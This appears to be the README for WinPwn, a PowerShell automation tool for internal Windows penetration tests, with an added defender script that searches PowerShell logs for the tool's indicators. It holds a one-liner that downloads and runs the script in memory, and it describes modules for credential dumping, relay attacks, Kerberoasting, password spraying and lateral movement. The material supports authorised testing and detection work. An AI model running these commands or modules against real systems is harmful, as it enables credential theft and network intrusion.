WinPwn - Automation For Internal Windows Penetration Tests


In many past internal penetration tests I frequently had problems with the existing PowerShell recon / exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large offensive security PowerShell projects. I simply load them one after the other into RAM via IEX DownloadString and partially automate the execution to save time.
Yes, it is not C# and it may be flagged by antivirus solutions. Windows Defender, for example, blocks some of the known scripts/functions.
It contains different local recon modules, domain recon modules, privilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!
Just import the modules with "Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after Import:

  1. WinPwn -> Guides the user through all functions/modules with simple questions.

  2. Inveigh -> Executes Inveigh in a new console window (https://github.com/Kevin-Robertson/Inveigh), SMB relay attacks with session management afterwards

  3. sessionGopher -> Executes SessionGopher and asks for parameters (https://github.com/Arvanaghi/SessionGopher)

  4. Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit)

  5. localreconmodules -> Executes Get-ComputerDetails and Just Another Windows Privilege Escalation script + WINspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS)

  6. JAWS -> Just Another Windows Privilege Escalation script gets executed

  7. domainreconmodules -> Different PowerView situational awareness functions get executed and the output is stored on disk. In addition a user list for DomainPasswordSpray gets stored on disk. An AD report is generated in CSV files (or XLS if Excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray)

  8. Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump)

  9. lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne)

  10. latmov -> Searches for systems with admin access in the domain for lateral movement. Mass-Mimikatz can be used afterwards for the found systems. DomainPasswordSpray for new credentials can also be used here.

  11. empirelauncher -> Launches a PowerShell Empire one-liner on remote systems (https://github.com/EmpireProject/Empire)

  12. shareenumeration -> Invoke-FileFinder and Invoke-ShareFinder from PowerView (PowerSploit)

  13. groupsearch -> Get-DomainGPOUserLocalGroupMapping - finds systems where you have admin access or RDP access via Group Policy mapping (PowerView / PowerSploit)

  14. Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking

  15. isadmin -> Checks for local admin access on the local system

  16. Sharphound -> Downloads SharpHound and collects information for the BloodHound DB

  17. adidnswildcard -> Creates an Active Directory-integrated DNS wildcard record and runs Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard)
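For defenders, the loading technique described above (IEX DownloadString into memory) and the module names in this list are visible in PowerShell script block logging. The following PowerShell is an added example, not part of WinPwn; it assumes script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) is enabled on the host being checked, and the pattern list is constructed from the names on this page:

```powershell
# Constructed list of indicators taken from this README: the in-memory loader
# pattern and the function names of the modules WinPwn wraps.
$patterns = @(
    'DownloadString\s*\(',            # iex (new-object net.webclient).downloadstring(...)
    'Invoke-Expression|\bIEX\b',
    'Invoke-Mimikatz', 'Invoke-WCMDump', 'Invoke-Kerberoast',
    'Invoke-Inveigh', 'Invoke-ShareFinder', 'Invoke-FileFinder',
    'Get-DomainGPOUserLocalGroupMapping', 'Invoke-DomainPasswordSpray',
    'WinPwn'
)
$regex = ($patterns -join '|')

function Find-SuspiciousScriptBlocks {
    param(
        [int]$MaxEvents = 5000,
        [datetime]$Since = (Get-Date).AddDays(-1)
    )
    # 4104 = "Creating Scriptblock text"; requires script block logging to be enabled
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # For 4104 events Properties[2] holds the ScriptBlockText field
            $text = [string]$_.Properties[2].Value
            if (-not $text) { return }
            $hits = [regex]::Matches($text, $regex, 'IgnoreCase') |
                ForEach-Object { $_.Value } | Select-Object -Unique
            if ($hits) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Host    = $_.MachineName
                    Matches = ($hits -join ', ')
                    Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Review the last 24 hours of script blocks on this host
Find-SuspiciousScriptBlocks | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Script block text is logged after any deobfuscation the engine performs, so renamed files such as the obfuscated executable mentioned below do not hide the function names once they run as PowerShell.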
The "oBEJHzXyARrq.exe" executable is an obfuscated version of jaredhaight's PSAttack tool for AppLocker/PS-restriction bypass (https://github.com/jaredhaight/PSAttack).
Todo:
  • Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.
  • Proxy options via PAC file are not found correctly at the moment.

Legal disclaimer:
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.